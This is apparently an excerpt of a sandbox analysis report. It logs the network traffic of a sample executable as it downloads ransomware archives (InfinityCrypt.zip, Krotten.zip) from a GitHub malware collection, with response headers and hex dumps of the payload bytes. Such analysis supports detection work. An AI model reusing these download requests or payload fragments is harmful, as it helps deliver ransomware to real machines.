2022-09-29 12:50:28 UTC | 1114 | IN | Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.6 | 49747 | 185.199.108.133 | 443 | C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp | kBytes transferred | Direction | Data
2022-09-29 12:50:29 UTC | 1116 | OUT | GET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/1.1
Host: raw.githubusercontent.com
2022-09-29 12:50:29 UTC | 1116 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 34300
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/zip
ETag: "560b96c943fc1b2cc0e25aa37950118e12457060c5829c2b558cdd36323f6802"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 0802:540B:2BBD66:3824C3:6335932B
Accept-Ranges: bytes
Date: Thu, 29 Sep 2022 12:50:29 GMT
Via: 1.1 varnish
X-Served-By: cache-mxp6921-MXP
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1664455829.051861,VS0,VE160
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
X-Fastly-Request-ID: 35971de62f62a1591845d0fdf45838cbfc98b0d2
Expires: Thu, 29 Sep 2022 12:55:29 GMT
Source-Age: 0
                                                                                                                                                                                      Data Ascii: ld]1RpUB+1o/q@4 1 ?T|a~zj!7py-sh{V6-rnFV}$-mdR|R@wO@HpJQ"!<MQ|HA$'@(T&eW;g z2iZ@rcM]S2<V|v2GvN
                                                                                                                                                                                      2022-09-29 12:50:29 UTC1138INData Raw: 67 07 2e e4 72 1c 2e f7 44 d7 94 19 62 36 3b c3 7e 23 ce 89 35 8a 82 10 11 c8 92 e0 27 8b d4 b4 7b 95 15 84 3b 65 d1 63 fd 82 c2 77 b1 c7 0f 22 7a 8a 0f 65 e6 4a 94 2c 29 4b 73 9f de 17 0b 55 c4 02 bb 6d 4a 00 be ec e6 b3 7c c1 68 f2 03 56 c9 bb 2f 40 df 26 c3 8b 2c ca 4f 7d 8c 06 4e bc dd 7a 3a c0 b5 81 ff 43 76 7a 41 f0 32 ff 83 e0 af 9c ab ae 4d 47 0e 12 a7 b1 31 e2 f2 2c 99 95 15 af 81 3d 23 bd 1e 38 7a 40 44 70 10 80 ad 7a 4d 34 79 29 12 75 0c f0 4a ed 00 32 8a fc 84 fb 30 43 7d da e5 0d 19 d1 26 75 9a 32 7d 62 b3 f4 a0 ed f6 34 fc 82 27 7e 30 3a 3f 3b 0d 20 99 2e 85 b8 a4 4b 6d 18 64 3b 11 fc 22 1e 17 ab 7b 8b f2 62 af ba 20 f4 53 d6 a3 c5 1a e4 47 da d4 0c 23 f3 a7 60 d6 ae 06 26 dd 5f 06 bd e4 93 47 ad 73 fe 1e 94 0c 56 9c 30 4a 93 02 b0 c0 e3 22
                                                                                                                                                                                      Data Ascii: g.r.Db6;~#5'{;ecw"zeJ,)KsUmJ|hV/@&,O}Nz:CvzA2MG1,=#8z@DpzM4y)uJ20C}&u2}b4'~0:?; .Kmd;"{b SG#`&_GsV0J"
                                                                                                                                                                                      2022-09-29 12:50:29 UTC1139INData Raw: 35 f5 8e 24 0c 44 c7 62 96 b4 1c 9e de 54 4a 32 fd 6f 5d 5d 16 35 27 5a 12 2e 5d a8 6b ad af d0 d1 b9 cc c9 12 09 2e ee b2 94 3d 0c 7d 89 38 a8 56 ca 35 8f 05 de 09 44 66 a2 fc 9f 34 be f5 de 18 fd 8c db 46 06 2a ef 5d 76 6a f8 22 8c 08 0e 68 17 5f 67 11 da 5c 13 16 71 89 b1 a2 ac ef bc 4a 61 9f 74 c7 5f 40 12 8f 5c 8c 76 c4 8f f2 c8 ee fe b1 00 f1 f1 2a 1d c5 31 2f 5e 63 ab 43 73 c0 b7 5c e2 3d 03 9e dc 80 f9 7b ad ec e1 e7 84 9d 65 ff e4 85 2c 59 8d 2b 15 50 46 11 74 27 f0 7a b5 51 73 51 d0 7f 86 7f 3c 7c a7 bd ea af bf 73 31 53 07 e2 4e c9 19 69 52 33 80 1c 58 5f a2 9b 8a 7e 6f 5e dc 68 e6 5a 46 c8 d8 0a 8d 5b c4 95 53 ba 44 af 23 ec 4a 8b 82 d8 a2 29 cc aa 84 94 bd b9 97 29 0d f0 96 25 47 35 da 24 4c f4 9e 1a 24 14 9f 6e f7 35 15 0a d2 09 00 21 39 aa
                                                                                                                                                                                      Data Ascii: 5$DbTJ2o]]5'Z.]k.=}8V5Df4F*]vj"h_g\qJat_@\v*1/^cCs\={e,Y+PFt'zQsQ<|s1SNiR3X_~o^hZF[SD#J))%G5$L$n5!9
                                                                                                                                                                                      2022-09-29 12:50:29 UTC1141INData Raw: fc d0 c7 e3 c0 a9 87 b5 19 b7 18 b8 19 75 4f b9 f3 31 01 54 03 66 c6 d3 c9 aa 58 14 fb 32 67 4c 72 34 dc 6a 52 31 73 30 6a a9 b3 5a 23 90 b7 7e 34 9d 1e dd a2 67 57 d5 46 4a 16 64 e0 58 76 e9 29 8b 09 f3 b1 a6 66 5d 0c b8 30 1c 92 6e 12 b4 62 7b 5e 48 30 fc e5 00 ee 57 a3 f5 9e 2f 85 0b 3e f8 d9 02 4e ce 8b 5a e4 12 48 13 12 9a c1 c1 cd 97 25 3f 1b 05 d1 00 79 5a ee c7 e1 93 a4 13 bf 00 2a 63 aa aa 6c 96 e0 e1 c0 4c df f8 70 94 de 0b ab 24 05 2a 28 5b 7d 8a 5b 88 1d 07 69 0f f6 83 bc bf 4b 64 f9 dd 41 fa d7 30 27 d1 b6 a4 ea aa 97 ff 15 29 81 e4 05 18 d0 d0 13 a5 c6 80 5e 27 ca dd f3 c9 17 ed f1 83 9d 2b 50 b5 33 6c 67 07 2a 5f 34 8f fa 97 43 fc ad 14 3c 3e f7 26 40 bb 02 24 bf e9 37 87 63 b6 2c da 76 d0 a8 2a 8b 69 00 b2 96 c2 51 1a 63 35 78 2b 76 d8 97
                                                                                                                                                                                      Data Ascii: uO1TfX2gLr4jR1s0jZ#~4gWFJdXv)f]0nb{^H0W/>NZH%?yZ*clLp$*([}[iKdA0')^'+P3lg*_4C<>&@$7c,v*iQc5x+v
                                                                                                                                                                                      2022-09-29 12:50:29 UTC1142INData Raw: d1 05 3a 8c 59 a6 b0 c3 09 8a 36 7e 25 46 14 07 53 76 e2 44 ef 79 47 7c 0b da 8f bb 07 67 47 f2 e7 66 32 a3 c4 e8 10 1a 7a da e6 80 9c dd 44 f4 35 63 d7 64 a0 43 69 c9 e0 91 21 b5 96 ab 95 e0 da d8 a8 a5 a3 75 fa 72 5b 97 6c 1c 23 48 d2 a9 25 5a e2 84 e3 5c 13 81 f2 4e 19 d7 91 c0 58 ba a6 31 ba 4f b7 1e 72 ab b0 ff d7 91 be 24 dc 27 a5 e1 00 4d bd 59 97 8f f6 85 c0 0b 02 61 79 0e 23 a3 73 10 fd 22 92 a8 f6 f5 3d d1 7c e7 8c a5 a4 f4 b7 76 18 ec 64 84 e4 85 61 01 3f 7c e6 4b c5 5b e7 dc 96 1a 76 db 32 0d 7a 1b de 0d 2d a9 c9 ba d0 1a 5a 35 db 4e f0 06 56 3a ca d4 a5 58 0e 66 71 4c de 86 d8 2a 1c d5 a4 99 6c 0c 03 03 f6 b8 44 11 02 46 c5 95 6f fd 64 f7 b4 32 3c 4e f5 b5 a3 d2 4b 7e 6a a6 93 ab 2d d6 8e 4f 14 81 d5 29 2c da 79 ac 30 7a 4e 19 6d c4 9d 9c de
                                                                                                                                                                                      Data Ascii: :Y6~%FSvDyG|gGf2zD5cdCi!ur[l#H%Z\NX1Or$'MYay#s"=|vda?|K[v2z-Z5NV:XfqL*lDFod2<NK~j-O),y0zNm
                                                                                                                                                                                      2022-09-29 12:50:29 UTC1143INData Raw: 9d e9 26 66 0b c0 be a2 8a f2 b5 49 97 8b 71 fe 8c 57 af 97 c6 37 17 62 a2 47 11 ba c7 55 ef ba 63 b6 74 06 4f 4d 35 99 81 02 8a 76 18 a0 32 4a 64 53 d3 bf 05 55 ca 03 ac fc 77 e4 4f 90 d3 e0 c5 c1 75 e5 33 6f 92 85 38 36 00 fd ea 92 e9 d9 da 56 e0 6d 2e ec c6 ed 92 62 f1 45 40 ef 69 14 2c 83 49 05 bc f0 45 5c 70 2d 2a e2 38 82 3e 86 c3 d7 62 25 f6 46 f5 6e 71 4c 47 25 ec 0b 80 d5 96 c2 7d 0f 2d c7 00 55 c1 d7 56 de cd 35 4b b5 9b 06 87 4b 03 85 d2 13 f5 46 8f da 9e 76 88 a4 29 40 97 b0 15 99 b5 22 d4 a1 af ee 8b d5 78 96 e1 10 a8 18 1e e4 8f 2c d5 85 13 57 f1 e6 d2 a8 29 63 56 03 ea 12 23 4e e1 18 15 77 ba 2c 36 5f 67 d5 6f 58 7d 86 23 b4 22 32 0e 05 ee 2e c5 37 ef 5c c0 12 d5 9b d0 a9 d1 64 61 69 ad 91 37 73 fa 16 37 b1 60 4b 84 e5 ef 64 25 a6 ab 8b fb
                                                                                                                                                                                      Data Ascii: &fIqW7bGUctOM5v2JdSUwOu3o86Vm.bE@i,IE\p-*8>b%FnqLG%}-UV5KKFv)@"x,W)cV#Nw,6_goX}#"2.7\dai7s7`Kd%
                                                                                                                                                                                      2022-09-29 12:50:29 UTC1145INData Raw: b7 59 6a c0 79 dc 53 40 76 b2 72 ae bc 89 15 cd 23 2c 1e 0d 7f aa 04 e6 fb 87 d0 50 72 0c 4b 41 ab c0 ba 75 54 dd d8 77 0a 60 7c b3 8b 45 a5 14 03 9e 92 e5 a4 97 a2 cc 83 d0 f8 e8 49 25 64 1b 0e 54 e0 48 9b 4e 02 f1 51 37 be 63 03 a3 96 e3 59 5d 35 a9 7e d8 96 e2 d2 22 d3 49 02 62 20 2c af 4f 2f dc 12 ba ec ae 0a d4 a4 5a 39 62 bc 0a 0b 0c 78 f4 3d 3a 96 d1 cd 1d da fe 87 6f f3 d5 cc 5f fd a8 c5 cf ea e6 02 c6 4b 92 83 b7 d3 28 27 6f cf 20 b8 8b 16 55 88 a8 ed da e0 c7 49 ef 13 df 90 0a eb 22 2a 57 a0 05 21 02 85 00 5a c6 ee 23 51 88 b0 41 b1 0d e8 7a 5d e7 98 20 eb 8a e5 2a 09 55 c0 7c 28 f6 59 d8 fc 3d fe d1 8a 52 99 5d 19 ae 08 ba df ee c4 8a 9d 8f e0 6d 75 ed 0b 3c 63 a3 f3 de ae 2a 81 1d 39 f7 5b 50 44 73 f6 d9 08 61 80 03 af 89 a6 01 cc f2 ae 55 f6
                                                                                                                                                                                      Data Ascii: YjyS@vr#,PrKAuTw`|EI%dTHNQ7cY]5~"Ib ,O/Z9bx=:o_K('o UI"*W!Z#QAz] *U|(Y=R]mu<c*9[PDsaU
                                                                                                                                                                                      2022-09-29 12:50:29 UTC1146INData Raw: 59 68 ed 48 0b 4b 60 bb d2 44 31 04 9a 18 60 1e 68 b7 97 2a 8c 3f 6c b4 11 c6 3c 2c 4c 70 f1 40 ee 0b a5 b0 03 07 e5 09 49 a9 3d 28 3c 73 d4 67 17 cd b3 97 4b 8d c5 c0 be e1 a6 79 12 12 df 9e 8f 9e b5 fa e4 68 68 41 20 e3 c4 f5 a8 4d ec 28 93 3c 10 78 48 be 06 01 00 3c 14 af eb 98 8e 24 79 a5 7d 04 4e 2f f5 4e ff a4 b7 6b 64 78 86 9e 66 8e b6 86 58 fd 3c 50 61 70 9a e0 02 78 96 63 98 5d fc c4 23 53 fd 80 4b 2d 7a a0 73 4a 75 e1 b1 4b f3 cd b0 f7 11 8d 33 0d b6 6a 30 d7 26 fd 5c fb a7 e2 cc 34 ea 91 de c8 3f a0 76 ec d7 32 83 0a 95 2d 53 01 e4 8d c9 2c 43 8f 0f 00 0a 80 90 fc 32 4f f6 77 53 dd 44 96 3a 6f f5 01 66 12 1c 3b a7 eb b7 3c e5 3e eb 4b 8f 91 4a ca dc 35 0e 21 af e2 df 2e 39 3e f6 f0 3f ec 43 c0 7d e9 06 bb 66 fe 5e 8f 9c c1 a9 41 d6 31 ff cb 2a
                                                                                                                                                                                      Data Ascii: YhHK`D1`h*?l<,Lp@I=(<sgKyhhA M(<xH<$y}N/NkdxfX<Papxc]#SK-zsJuK3j0&\4?v2-S,C2OwSD:of;<>KJ5!.9>?C}f^A1*
                                                                                                                                                                                      2022-09-29 12:50:29 UTC1148INData Raw: 60 6a d3 38 e0 a9 a6 98 c6 d4 8f c5 71 2d 02 b2 f1 d3 8f 27 61 5d 43 6e a0 79 00 f8 09 58 78 93 a2 c1 8d 3c 38 fd 65 92 00 4d 1b c2 59 b0 a2 7a c2 5e 5d a7 99 17 ea 2c d9 c4 d2 fd ed 33 5a 14 a2 4e 45 2b 7c 97 c7 fc e7 6c c9 c8 59 b5 8f dd f2 c5 30 f8 35 1f 6e f5 08 c1 7a fd c4 29 3f b9 3a 43 fa ef c0 d7 39 0c 5f fa 22 61 cb 49 f1 06 a9 fc 40 47 46 13 62 5a 55 79 43 e2 80 db 9a c6 d0 cc 66 5c 23 bb 21 b4 44 9f 11 43 80 8a 90 9d c5 55 0b a8 d2 eb 35 20 e8 72 dc ac 16 5e 6b f4 53 0a 89 49 7c 18 86 58 73 52 06 5d e5 2f bd 0f 90 29 9c b5 19 cf 1b 1e 03 ec 8d 13 ea cb c2 4d 87 dd 18 22 06 52 de 7e a9 24 96 71 67 54 ee a6 35 05 bc 8a 01 cd 35 a0 a1 c9 fb e1 e6 c1 61 ea cb ac 99 a5 1a 61 0b 2f 93 ec 0e 2e b1 f6 5a 25 7f 16 ec ce 65 20 97 37 c0 fc 98 16 40 16 5e
                                                                                                                                                                                      Data Ascii: `j8q-'a]CnyXx<8eMYz^],3ZNE+|lY05nz)?:C9_"aI@GFbZUyCf\#!DCU5 r^kSI|XsR]/)M"R~$qgT55aa/.Z%e 7@^
                                                                                                                                                                                      2022-09-29 12:50:29 UTC1149INData Raw: e7 90 e3 3c ac 3b 94 69 03 8f 11 d4 e1 bc 85 c2 be dd 36 41 cc 1b ba 0c 59 86 0f 33 96 9b 38 6b 74 68 42 5c e3 55 81 20 bc c9 e9 35 be 3f 1e 8c b6 82 d1 c4 42 48 d7 45 d2 65 e9 a3 35 15 20 94 67 87 1d 7e 12 74 d4 4d 32 b3 eb 69 a1 46 71 59 22 33 b2 54 0e 18 d9 2c f1 e8 95 a4 8c 64 ba 66 db 2c 07 ad f4 70 6c 09 c5 d4 b9 63 a0 d5 35 fb 81 93 da cc d1 e3 ad 7c d5 8d 35 44 66 78 d0 fa de 95 98 c7 c9 91 2a c1 f1 fb 35 63 65 3b 4d a7 30 ec 40 c5 ad e1 23 8a 79 66 2f 52 b1 28 b7 76 73 f2 ab 3b 4a e0 f4 60 60 fb ad 50 28 6c b1 51 ee cd 69 5b f7 29 ae 4f 35 01 70 4d 35 8f 2d a1 df 57 cc f6 5d b9 3c 40 e1 f5 4a 47 1b 95 4f 60 43 1c 70 a0 7e e1 ab 04 3a a2 01 93 41 ec f2 e6 6b 02 82 22 97 91 8d a4 df 67 48 ee 77 00 e2 c2 ec aa 9c 8b d1 28 07 6a 70 c9 75 18 d0 d6 72
                                                                                                                                                                                      Data Ascii: <;i6AY38kthB\U 5?BHEe5 g~tM2iFqY"3T,df,plc5|5Dfx*5ce;M0@#yf/R(vs;J``P(lQi[)O5pM5-W]<@JGO`Cp~:Ak"gHw(jpur


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
12          192.168.2.6  49754        140.82.121.4    443               C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp                kBytes transferred  Direction  Data
2022-09-29 12:50:34 UTC  1150                OUT        GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip HTTP/1.1
    Host: github.com
2022-09-29 12:50:35 UTC  1150                IN         HTTP/1.1 302 Found
    Server: GitHub.com
    Date: Thu, 29 Sep 2022 12:50:35 GMT
    Content-Type: text/html; charset=utf-8
    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    Access-Control-Allow-Origin: https://render.githubusercontent.com
    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip
    Cache-Control: no-cache
    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
    X-Frame-Options: deny
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Referrer-Policy: no-referrer-when-downgrade
    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
2022-09-29 12:50:35 UTC  1151                IN         Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
13          192.168.2.6  49755        185.199.108.133  443               C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp                kBytes transferred  Direction  Data
2022-09-29 12:50:35 UTC  1153                OUT        GET /Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip HTTP/1.1
    Host: raw.githubusercontent.com
2022-09-29 12:50:35 UTC  1153                IN         HTTP/1.1 200 OK
    Connection: close
    Content-Length: 26359
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: application/zip
    ETag: "b4c9a9caad9a8cc039faac50748e91b4ea099c21f7a0b4b606256ae51df449bc"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: 080E:67C0:101BE30:11154D1:6335932F
    Accept-Ranges: bytes
    Date: Thu, 29 Sep 2022 12:50:35 GMT
    Via: 1.1 varnish
    X-Served-By: cache-mxp6939-MXP
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1664455835.301678,VS0,VE167
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    X-Fastly-Request-ID: 498fbdf1a28d236903ebc8b64a5301ce0d3bba3a
    Expires: Thu, 29 Sep 2022 12:55:35 GMT
    Source-Age: 0
                                                                                                                                                                                      Data Ascii: Es7NxLN]u~R5=H8<6Tjl-wX+`-C&/lp|r@5Ab^I"BG}[v7*nL2r*LXvQmq&ww'=d!Tn}?9n3D@>"\MX|aVxxz.-SE4@Yj(pw
                                                                                                                                                                                      2022-09-29 12:50:35 UTC1163INData Raw: 3b 7f 40 3b d1 ff 3b 95 d0 c1 af ab fa cb a9 83 a6 ac f8 7f b2 1e a2 b3 72 4e cc fa bb d1 99 3f 90 a2 b2 10 c6 44 3c 53 d0 2a 28 26 f7 e1 65 28 c2 18 9d 41 5e b8 81 6c ac c5 83 15 09 00 62 bf e8 b5 03 57 75 05 ac ed d3 db 48 4e 7a 1f d8 11 73 e7 8f 72 19 8c 50 7a 52 27 d2 af d8 64 fe 67 9b cc c2 9e f4 a8 bd 13 41 7e ab 73 ff ed e1 af b7 eb 1d a9 31 43 ee ad c4 bc ab 2d 49 27 ee 80 3d c4 b7 45 dc c8 bf 8f 4c dc 86 50 ee fd 5f 65 9e 77 09 b5 d2 3a 22 39 f9 7f 26 6a a2 52 a6 39 0f 78 e3 64 69 9c 5e 4d 2a e5 23 cd 88 ff 51 43 e7 4d c4 a7 81 c1 66 f8 6c a4 a2 0d be 5d 59 a9 d9 c4 8d 5c 45 0f 40 3f 72 f7 66 8d ef f4 56 61 8d 29 4b db 3c b8 25 01 d8 54 c4 89 80 f8 da 4d cc fb c2 31 4d fe 33 bd ae bf 2b ff 99 45 8e b3 2a be b8 9f b7 63 c1 c2 50 72 fb 58 e8 24 e3
                                                                                                                                                                                      Data Ascii: ;@;;rN?D<S*(&e(A^lbWuHNzsrPzR'dgA~s1C-I'=ELP_ew:"9&jR9xdi^M*#QCMfl]Y\E@?rfVa)K<%TM1M3+E*cPrX$
                                                                                                                                                                                      2022-09-29 12:50:35 UTC1164INData Raw: 28 9b 60 1e 71 b8 90 ee e6 49 14 f3 4c 4a 84 4d 24 40 91 9b 4a c8 8a 32 04 2c 23 f2 a5 55 2c 3a aa 65 3e 2d d2 4e f9 de 40 b9 c2 98 2e f2 35 b1 e7 f9 fb b1 12 b3 ca b8 75 3e ab 61 b9 8b 73 9b 1a e0 57 f4 39 39 ba 5f 35 80 61 23 90 86 0e c4 2e e8 12 7d 89 5b ac 2e 27 0e 1c 33 76 67 be 99 31 ce 75 23 0d 55 eb 67 aa 91 2f bd 76 13 97 92 61 58 52 20 42 05 c4 20 2b 18 ec 4a 9f ba 42 70 93 9e 72 9e 75 7b 42 09 0e 09 50 fc 92 5e 95 05 f2 b3 f3 ec 94 7a 2d ea c1 05 07 99 d2 7c c2 0f 06 96 5b 48 13 e9 92 f4 8b 89 b3 9a 7c 26 a5 27 06 78 2a f2 a9 b7 02 18 2a f9 af 29 b4 42 be bf d9 b4 1f da da 22 2f 0e 7c 10 b4 76 fd c5 74 94 ac 39 04 9e ff 9a f5 c7 b1 9c 5c 97 34 92 b7 75 07 72 ec 1a 1f 1e 82 b2 e3 30 96 47 ba 11 ce e0 07 01 6e bb be 65 f2 7f fd b5 c3 d5 23 ce 8d
                                                                                                                                                                                      Data Ascii: (`qILJM$@J2,#U,:e>-N@.5u>asW99_5a#.}[.'3vg1u#Ug/vaXR B +JBpru{BP^z-|[H|&'x**)B"/|vt9\4ur0Gne#
                                                                                                                                                                                      2022-09-29 12:50:35 UTC1166INData Raw: c7 11 83 83 4a d7 2f 05 22 24 93 49 ef 67 7e 71 b7 11 82 b1 65 d9 e8 5c b9 f1 a0 5c b0 d2 9d e8 f0 a0 a3 b6 47 b0 39 68 91 ca f0 09 55 d8 bc 30 8d d3 99 af b8 86 0b 29 c8 e1 7b 72 4f 12 a5 23 32 65 ac 6c 52 67 9f ee 69 11 f6 57 a0 fd 2e 11 5d 91 cb ce 0f ba 60 65 4d ca 8b 93 b3 9b a1 9c 73 0b 1a 59 aa 66 c8 3b 43 6d bf 99 c4 e3 2a 1d 23 bd e5 85 de 96 b9 59 ba 21 74 09 22 2f 61 7d 8a b8 ea 4d 9c ac 15 5d 2d a3 85 61 b9 87 f4 16 54 88 93 e7 4e 9b 79 fb 79 25 9b 51 7d 00 e9 15 90 4d 90 a8 0b b5 28 43 05 34 1a ad 6e 2c f3 e3 ad 4a 76 1e e7 ec f4 2f 4d 6d 77 dc e1 03 19 ef 7a 47 9b a0 2d f3 64 a0 b0 71 6e f4 dc 97 80 f8 48 90 0b 07 7f dd 86 97 d4 a3 fa d4 0c 10 ff 9f e9 f6 48 1a 47 d0 7b 51 6a 30 53 3f 6f 81 8a 9c 0e e8 67 56 16 e8 6b 4f c7 85 35 c0 f3 5b 9c
                                                                                                                                                                                      Data Ascii: J/"$Ig~qe\\G9hU0){rO#2elRgiW.]`eMsYf;Cm*#Y!t"/a}M]-aTNyy%Q}M(C4n,Jv/MmwzG-dqnHHG{Qj0S?ogVkO5[
                                                                                                                                                                                      2022-09-29 12:50:35 UTC1167INData Raw: 77 8f 84 bc 58 35 a6 bb 88 b1 f0 db af e7 13 aa 31 8b cb bc 9f d7 06 04 7f 3c 6c 70 95 f0 80 fc 2d 7f 89 b3 52 fd df 59 3f c7 32 f4 8b ab 20 1a 82 83 29 d6 3e 64 7e 5a 61 f2 2d 31 66 e1 c6 20 8d 20 1c 4d f1 79 7c af 83 cf ac 52 d2 3d 4c 88 0f 06 e1 5a 9d b4 25 83 d2 d4 b5 72 e3 8a f7 63 88 67 a2 98 9e c5 0a bd 7c e1 5c 79 7a 55 f2 c1 12 89 08 68 14 41 9d 2e f6 27 ce fb 04 c3 9f b5 91 46 95 d8 e2 d7 24 de b9 f1 06 c0 e7 1a 49 35 66 05 90 4b ea b0 ad a9 c7 c9 2d fc d9 4e 92 83 37 94 92 46 9e 0f 46 33 6b c9 c9 1f b2 b6 0d 8c ba 5c 42 30 84 72 d2 91 ec 9b d8 bd 5d 9c 89 db fd 83 a9 60 44 a5 86 2d d9 cd b1 3b e4 71 5f 33 ce a8 8d be a3 37 3d f0 6f 4c 72 49 a4 1b 10 56 a3 3b ac ff cb b2 9a 8c 60 8d 51 20 05 9d 2e 29 46 f1 b8 8f 41 1c 11 59 85 8b 74 20 97 0f 1a
                                                                                                                                                                                      Data Ascii: wX51<lp-RY?2 )>d~Za-1f My|R=LZ%rcg|\yzUhA.'F$I5fK-N7FF3k\B0r]`D-;q_37=oLrIV;`Q .)FAYt
                                                                                                                                                                                      2022-09-29 12:50:35 UTC1168INData Raw: 9c 6d f9 e7 6a 05 78 60 43 3a ae 4f c8 bd d4 99 fd 43 25 bb 0c 43 ce 48 67 45 23 bd 54 ed 8b 01 b0 2b 2d 16 56 55 a5 bb 5b 09 1b ca 3c 84 d9 3a af 4d ae 6c 80 a4 53 18 ea fc 3e fe 7c 59 a4 1d 5f 33 aa 13 67 82 b4 b9 b1 bf 28 19 71 1b 8a 00 16 19 1f b2 20 fa 2c 6a 68 77 e5 96 dc fc 38 76 0e 91 72 c6 fb 40 5c ef 1a ed 71 42 1d e2 23 47 17 13 35 36 ae 59 9b 79 56 b7 64 84 0b 27 53 d4 7c d7 4c bc 92 89 2a bb b4 4b 8b c1 0a 37 4b 06 50 05 1e 8c 9a 41 c7 95 50 4d 16 62 5b 53 d7 d4 c5 61 b3 03 ee 8e 90 d9 81 ff b1 b9 48 86 43 a5 6a 5e ee 47 da a4 b9 6f df d5 8c 61 3d 0a a2 8f 95 c4 5b 58 e4 02 2b 8f ec 45 01 7c d1 99 5a 40 5f 85 5d 4f 3d 31 39 62 0b dc 6f 1b 2b d6 75 c0 c1 b1 ac 30 cc af f7 8a ca 2d 87 70 d0 22 83 21 b6 55 85 86 09 f2 91 bf 93 05 7f 7d f2 ac 4b
                                                                                                                                                                                      Data Ascii: mjx`C:OC%CHgE#T+-VU[<:MlS>|Y_3g(q ,jhw8vr@\qB#G56YyVd'S|L*K7KPAPMb[SaHCj^Goa=[X+E|Z@_]O=19bo+u0-p"!U}K
                                                                                                                                                                                      2022-09-29 12:50:35 UTC1170INData Raw: d7 96 a6 46 21 be c7 f2 21 a3 17 81 67 78 5e 72 29 0d 1a dd 0a 8a 99 bc 10 73 a9 4f fa 66 b2 0f e5 7f 8a e7 10 cc c6 2d 66 a8 c3 86 dc 08 95 19 fe e5 ee 6b 41 f8 83 0f a8 b8 c8 43 8f 14 8b df 5a 81 1c e8 81 ef 12 93 91 31 ba db 04 06 9f c0 9e 08 1d 85 38 c3 ea 6e ff a3 a2 09 9d 5d cb a1 05 62 cd 88 bd 83 37 74 f6 a3 db 27 5a e2 4c 7e 7c aa 58 3f 2a e6 3e 9e 76 16 95 c9 9d aa 9c 5b bf b9 f3 47 18 96 89 5c 34 1f 60 cf ae 4d 8c 5b 20 0d 5c 89 64 d8 3d 37 37 33 b2 31 24 d9 7c b5 b7 4e 0c ea b7 56 a6 0f e9 d6 20 2a 7f 6d 69 07 a2 c0 24 1c 79 8f b8 82 2e 64 64 57 97 73 84 d2 7f ee 46 cb c0 0c 83 b0 f9 26 29 54 3d e8 53 98 58 c1 73 b7 69 82 27 c2 a9 13 80 d1 11 e8 ae 22 b9 1f b2 95 3d 4e 62 e9 45 30 ac 17 d4 9f 86 6c a1 c6 18 63 49 bf 92 97 fe e6 0c 6a 16 d4 39
                                                                                                                                                                                      Data Ascii: F!!gx^r)sOf-fkACZ18n]b7t'ZL~|X?*>v[G\4`M[ \d=7731$|NV *mi$y.ddWsF&)T=SXsi'"=NbE0lcIj9
                                                                                                                                                                                      2022-09-29 12:50:35 UTC1171INData Raw: 02 9a 22 b8 f6 25 46 e6 92 c6 c7 d0 61 44 a3 68 46 c4 1f 19 e1 2a 37 2e b5 b7 4b 2a 7c 77 ce 54 99 5f 92 0c 2d 57 2b 38 af a3 28 a9 93 ed a4 b8 f5 09 73 7d 87 89 01 7a 67 11 61 e5 43 33 d8 11 2a ff 38 f0 1d 34 f6 a8 79 d8 7d 0f 31 aa 73 0e 01 4e f2 f9 e6 8e f0 03 78 28 52 cd 59 1a 68 49 01 a5 7f 25 55 9d 22 7e f8 a2 56 ce ab 8e 7c e3 47 fd da 98 67 97 a8 53 fe 0c 6d fc 6f f0 35 6a 3d 79 3f 93 12 8f 29 a3 54 1c f6 52 8e 9f c6 07 53 28 d1 f0 68 90 ba 5d 0c 9a 81 3b 57 7b 1e 9b 2c ff c1 e3 af b0 2e 74 7f 5c 8c 5e 92 96 a3 9b 1b ec 80 b7 8d 11 ac 4e db 29 ea 4e 5c 59 18 32 30 33 ea 7b 8d 15 f1 36 84 28 a7 e1 66 9b e6 1d 36 9c f1 60 e4 96 ad 21 3c 88 e2 0d ef 56 36 d4 d0 55 ad c0 29 c9 af c1 a2 93 b3 49 a0 65 67 a8 e9 d4 09 8a a2 0e 3d 40 01 af 7e 5c 85 be d5
                                                                                                                                                                                      Data Ascii: "%FaDhF*7.K*|wT_-W+8(s}zgaC3*84y}1sNx(RYhI%U"~V|GgSmo5j=y?)TRS(h];W{,.t\^N)N\Y203{6(f6`!<V6U)Ieg=@~\
